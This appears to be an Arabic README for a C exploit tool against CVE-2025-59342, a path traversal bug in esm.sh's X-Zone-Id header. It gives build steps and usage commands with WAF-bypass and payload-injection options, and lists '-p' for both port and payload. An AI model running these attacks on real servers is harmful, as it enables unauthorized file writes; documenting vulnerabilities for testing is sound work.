
استغلال بلغة C لـ CVE-2025-59342 ثغرة اجتياز المسار في CDN esm.sh (الإصدار 136 والإصدارات الأقدم). يحقن الحمولات عبر رأس X-Zone-Id مع تجاوز WAF ودعم ملفات تعريف الارتباط لاختبار الاختراق.
المؤلف: Byte Reaper
CVE-2025-59342 هي ثغرة من نوع تجاوز المسار (path traversal) في esm.sh، وهي شبكة توصيل محتوى (CDN) بدون بناء لتطوير الويب الحديث، في الإصدار 136 وما قبله.
توجد المشكلة في معالجة رأس HTTP X-Zone-Id، الذي يُستخدم لبناء مسار نظام الملفات. لا يتم تطبيع قيمة الرأس بشكل صحيح أو تقييدها بدليل القاعدة التخزيني للتطبيق.
نتيجة لذلك، يؤدي إدخال تسلسلات ../ في X-Zone-Id إلى كتابة ملفات خارج موقع التخزين المقصود.
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-59342 -lcurl
./CVE-2025-59342 -u http://target (المنفذ التلقائي = 80)
- وضع الإسهاب :
./CVE-2025-59342 -u http://target -v
- تجاوز WAF :
./CVE-2025-59342 -u http://target -v -b
- ملف ملفات تعريف الارتباط :
./CVE-2025-59342 -u http://target -c [FILE] -v
- منفذ الخادم المستهدف :
./CVE-2025-59342 -u http://target -p [PORT]
- الحمولة :
./CVE-2025-59342 -u http://target -p [Payload injection]
MIT